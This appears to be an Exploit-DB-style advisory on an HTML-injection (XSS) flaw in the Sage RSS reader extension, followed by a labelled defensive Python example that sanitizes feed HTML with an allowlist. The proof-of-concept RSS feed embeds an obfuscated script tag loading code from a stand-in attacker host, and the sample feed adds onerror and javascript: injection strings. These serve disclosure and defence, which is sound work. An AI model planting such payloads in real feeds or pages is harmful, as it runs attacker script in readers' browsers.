Vendor: Sage Extension Feed
By: Unknown
CVSS: 5.5 (MEDIUM)
Type: HTML-injection
CWE: 79
Product Name: Sage Extension Feed
Affected Version From: 1.3.2009
Affected Version To: 1.3.2009
Patch Exists: NO
Related CWE:
CPE: a:sage_extension_feed:1.3.9
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sage Extension Feed HTML-injection vulnerability

The Sage Extension Feed application fails to properly sanitize feed content before using it in dynamically generated content, leading to an HTML-injection vulnerability. Hostile HTML and script code can be injected into vulnerable sections of the application and is rendered in the browser of a user viewing a malicious RSS feed.

Mitigation:

To mitigate this vulnerability, sanitize feed content before using it in dynamically generated content. Users should also be cautious when subscribing to RSS feeds from untrusted sources.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22493/info

Sage Extension Feed is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Hostile HTML and script code may be injected into vulnerable sections of the application. When viewed, this code may be rendered in the browser of a user viewing a malicious RSS feed.

Sage Extension Feed 1.3.9 is vulnerable to this issue; prior versions may also be affected. 

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>test</title>
<link>http://www.example.com/</link>
<description>test</description>
<item>
<title>test</title>
<content:encoded><![CDATA[
<SCRIPT/=''SRC='http://atackersite/xss.js'></SCRIPT>
]]>
</content:encoded>
</item>
</channel>
</rss>
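The mitigation above (sanitize feed content before it is used in generated markup) is shown here as an added example that is not part of the advisory, of Exploit-DB or of the Sage extension. It parses a feed constructed to mirror the proof of concept, including the malformed `<SCRIPT/=''SRC=...>` tag, and rebuilds each `content:encoded` body from an allowlist of elements and attributes rather than trying to recognise bad tags by pattern. The feed text, the allowlist and the function names are assumptions made for this example; the sanitizer also reports which tags it dropped, which a feed reader could log as a signal that a feed is carrying active content.

```python
"""Allowlist-based sanitizer for RSS item HTML, run over a feed modelled on
the advisory's proof of concept. Added example; not part of Sage or Exploit-DB."""
from html import escape
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

# Constructed sample feed: same shape as the PoC, but well-formed XML, with a
# benign paragraph and two further common injection forms added for the demo.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>test</title>
<link>http://www.example.com/</link>
<description>test</description>
<item>
<title>test</title>
<content:encoded><![CDATA[
<p>Hello <b>reader</b> &amp; <a href="http://www.example.com/">site</a></p>
<SCRIPT/=''SRC='http://attacker.example/xss.js'></SCRIPT>
<img src="x" onerror="alert(1)">
<a href="javascript:alert(1)">click</a>
]]></content:encoded>
</item>
</channel>
</rss>
"""

CONTENT_NS = "{http://purl.org/rss/1.0/modules/content/}"

# Only these elements survive. Unknown elements are dropped but their text is
# kept; script/style are dropped together with their bodies.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br",
                "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}}      # no event handlers, no style, no src
VOID_TAGS = {"br"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class AllowlistSanitizer(HTMLParser):
    """Rebuilds HTML from an allowlist; the tokenizer normalises the PoC's
    `<SCRIPT/=''SRC=...>` to tag name 'script', which is simply never emitted."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []
        self.dropped = []      # tag names removed; usable as a detection signal
        self._discard = 0      # >0 while inside script/style: drop their text too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._discard += 1
            self.dropped.append(tag)
            return
        if self._discard:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        safe = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue   # rejects javascript:, data: and similar URLs
            safe.append(f' {name}="{escape(value, quote=True)}"')
        self.parts.append(f"<{tag}{''.join(safe)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._discard = max(0, self._discard - 1)
            return
        if self._discard or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._discard:
            self.parts.append(escape(data))   # text is always re-escaped

    def result(self):
        return "".join(self.parts)


def sanitize_html(fragment):
    """Return (clean_html, dropped_tags) for one HTML fragment."""
    s = AllowlistSanitizer()
    s.feed(fragment)
    s.close()
    return s.result(), s.dropped


def sanitize_feed(xml_text):
    """Sanitize every <content:encoded> body in an RSS 2.0 document.
    Returns a list of (item_title, clean_html, dropped_tags)."""
    root = ET.fromstring(xml_text)
    out = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        enc = item.find(CONTENT_NS + "encoded")
        raw = enc.text if enc is not None and enc.text else ""
        clean, dropped = sanitize_html(raw)
        out.append((title, clean, dropped))
    return out


if __name__ == "__main__":
    for title, clean, dropped in sanitize_feed(SAMPLE_FEED):
        print(f"item {title!r}: dropped {dropped}")
        print(clean)
```

Running the script prints the item with `script` and `img` listed as dropped, the benign markup preserved, and the `javascript:` link reduced to a bare `<a>`. The allowlist approach is the point: a denylist keyed on the literal string `<script` would not match the PoC's tag, whereas a parser that only ever emits known-safe elements needs no knowledge of the attacker's spelling.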